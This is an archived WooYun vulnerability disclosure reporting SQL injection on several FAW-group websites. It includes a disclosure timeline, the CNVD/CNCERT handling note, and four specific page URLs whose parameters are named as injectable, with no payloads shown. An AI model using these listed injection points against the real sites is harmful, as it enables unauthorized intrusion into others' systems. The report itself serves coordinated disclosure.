
Vulnerability Summary

Defect ID: wooyun-2014-089434

Title: SQL injection in multiple FAW-Volkswagen sites

Vendor: FAW-Volkswagen

Author: 勿忘初心

Submitted: 2014-12-31 16:19

Fixed: 2015-02-14 16:20

Published: 2015-02-14 16:20

Type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: handed over to a third-party partner organization (CNCERT, the National Computer Network Emergency Response Technical Team) for handling

Source: http://www.wooyun.org; for questions or assistance, contact [email protected]



Vulnerability Details

Disclosure status:

2014-12-31: Details sent to the vendor, awaiting vendor handling
2015-01-05: Vendor confirmed; details disclosed to the vendor only
2015-01-15: Details disclosed to core white hats and relevant domain experts
2015-01-25: Details disclosed to regular white hats
2015-02-04: Details disclosed to intern white hats
2015-02-14: Details disclosed to the public

Brief description:

SQL injection in multiple FAW-Volkswagen sites

Detailed description:

FAW-Volkswagen site, SQL injection #1
http://www.sftm.com.cn/event_detail.asp?ClassID=0204&id=839

[Screenshot: 1.jpg]


FAW-Volkswagen site, SQL injection #2
http://service.faw-mazda.com/Spareparts/index.php/shangkujingpin_ryjc/detail?id=329

[Screenshot: 11.jpg]



Proof of vulnerability:

FAW-Volkswagen site, SQL injection #3
http://www.faw-foundry.com.cn/qydt.jsp?typeid=1&where=xxdt

[Screenshot: 111.jpg]


[Screenshot: 112.jpg]


FAW-Volkswagen site, SQL injection #4
http://www.fawjiefang.com.cn/zplist.jsp?id=209

[Screenshot: 0.jpg]

Remediation:

Null

Copyright notice: when reposting, please credit the source: 勿忘初心@WooYun


Vulnerability Response

Vendor response:

Severity: High

Vulnerability Rank: 12

Confirmed: 2015-01-05 08:17

Vendor reply:

CNVD has confirmed and reproduced the reported issue; it has been forwarded via CNCERT to the Jilin branch center, which will coordinate handling with the website's operating unit.

Latest status:

None yet